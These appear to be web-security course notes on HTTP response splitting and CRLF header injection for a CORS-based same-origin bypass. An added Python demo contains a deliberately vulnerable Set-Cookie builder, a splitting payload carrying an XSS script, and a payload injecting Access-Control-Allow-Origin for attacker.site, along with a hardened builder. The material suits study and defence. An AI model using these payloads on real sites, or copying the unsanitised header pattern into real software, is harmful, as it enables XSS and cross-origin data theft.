HTTP Response Splitting
HTTP/1.1 terminates every header line with CRLF (\r\n) and marks the end of the header block with an empty line (CRLF CRLF). If user input containing raw CR and LF characters is copied into a response header, an attacker can end the header block early and append a complete second response of their own, so the single response the server meant to send is parsed by the client as two. This is HTTP response splitting.
This is different from plain header injection, where the injected CRLF only adds extra headers to the same single response and no second response block is created.
Things to look for:
The application places user input into a response header (Location on redirects, Set-Cookie, custom headers).
Set-Cookie is a good header to test, since cookie values are often built straight from request parameters.
Sites that pull the referring domain (Referer) into a header or cookie to track the last site you visited.
There may be sanitization to get around: try the URL-encoded form (%0d%0a) and double-encoded variants rather than literal line breaks.
Example from eLearn:
In the split response the browser treats the attacker-supplied second block as a legitimate response and renders it, so it can carry an XSS payload or attacker-chosen HTML (apparent defacement). For the split to work the first response must close its body before the second status line (for example with an injected Content-Length: 0), and the second response needs its own Content-Type and Content-Length headers.
SOP Bypass (header injection):
Here the injected header is a CORS header, typically Access-Control-Allow-Origin: attacker.site (plus Access-Control-Allow-Credentials: true if the victim's cookies are needed). The attacker then hosts a page at attacker.site/evil.php whose JavaScript performs a cross-domain AJAX request to the target, with the injection payload included in that request so the response carries the permissive header; the browser then lets the attacker's script read the response body and exfiltrate it.
If the header injection does not succeed, the response carries no Access-Control-Allow-Origin for attacker.site and the browser's same-origin policy blocks the script from reading the cross-origin response.
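Both techniques above in one place, as an added example that is not part of the original notes: a toy response builder with the CRLF flaw, a minimal parser showing how a client carves the bytes into responses, the splitting payload (second response carrying XSS) and the header-injection payload (Access-Control-Allow-Origin for attacker.site), plus a hardened builder. The endpoint, the ?ref= parameter and the last_site cookie are assumptions for illustration.

```python
"""Added example (not from the original notes): a toy HTTP/1.1 response
builder with the CRLF flaw described above, a minimal parser showing how a
client would carve the bytes into responses, and a hardened builder.
The endpoint, the ?ref= parameter and the last_site cookie are assumptions."""
from urllib.parse import unquote

CRLF = "\r\n"


def vulnerable_response(referer: str) -> bytes:
    """Tracking/redirect endpoint that copies ?ref= into Set-Cookie unchecked."""
    lines = [
        "HTTP/1.1 302 Found",
        "Location: /home",
        f"Set-Cookie: last_site={referer}; Path=/",  # user input lands here
        "Content-Type: text/html",
        "Content-Length: 0",
    ]
    return (CRLF.join(lines) + CRLF + CRLF).encode("latin-1")


def safe_response(referer: str) -> bytes:
    """Hardened variant: refuse CR, LF and NUL before they reach a header line
    (Python's own http.client makes the same check and raises ValueError)."""
    if any(c in referer for c in "\r\n\x00"):
        raise ValueError("control character in header value")
    return vulnerable_response(referer)


def split_responses(raw: bytes) -> list:
    """Minimal client-side parser: a header block ends at CRLF CRLF and the body
    is Content-Length bytes, so whatever follows is parsed as the next response."""
    responses = []
    while raw:
        head, sep, rest = raw.partition(b"\r\n\r\n")
        if not sep:
            break
        lines = head.decode("latin-1").split(CRLF)
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body, raw = rest[:length], rest[length:]
        responses.append({"status": lines[0], "headers": headers,
                          "body": body.decode("latin-1")})
    return responses


# Constructed payloads, URL-encoded as they would appear in ?ref=.
# Splitting: close the first response (Content-Length: 0) and append a full
# second response whose body is an XSS payload of exactly 25 bytes.
SPLIT_PAYLOAD = ("x%0d%0aContent-Length:%200%0d%0a%0d%0a"
                 "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
                 "Content-Length:%2025%0d%0a%0d%0a"
                 "%3Cscript%3Ealert(1)%3C/script%3E")
# Header injection: stay inside one response but add CORS headers. The final
# dummy header absorbs the "; Path=/" the server appends after our input.
CORS_PAYLOAD = ("x%0d%0aAccess-Control-Allow-Origin:%20https://attacker.site"
                "%0d%0aAccess-Control-Allow-Credentials:%20true"
                "%0d%0aX-Pad:%20")


def attack(encoded_ref: str, builder=vulnerable_response) -> list:
    """Server URL-decodes the parameter, builds the response, client parses it."""
    return split_responses(builder(unquote(encoded_ref)))


def is_rejected(encoded_ref: str) -> bool:
    """True if the hardened builder refuses the payload."""
    try:
        safe_response(unquote(encoded_ref))
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for name, payload in (("split", SPLIT_PAYLOAD), ("cors", CORS_PAYLOAD)):
        for i, r in enumerate(attack(payload)):
            print(f"{name} response {i}: {r['status']!r} {r['headers']} body={r['body']!r}")
        print(f"{name} rejected by hardened builder: {is_rejected(payload)}")
```

Running the block shows the splitting payload producing a second response with status HTTP/1.1 200 OK and the script tag as its body (the parser also emits a harmless trailing junk block made of the server's leftover "; Path=/" and headers), while the CORS payload yields a single response carrying Access-Control-Allow-Origin: https://attacker.site. The hardened builder rejects both payloads but still serves an ordinary referer value.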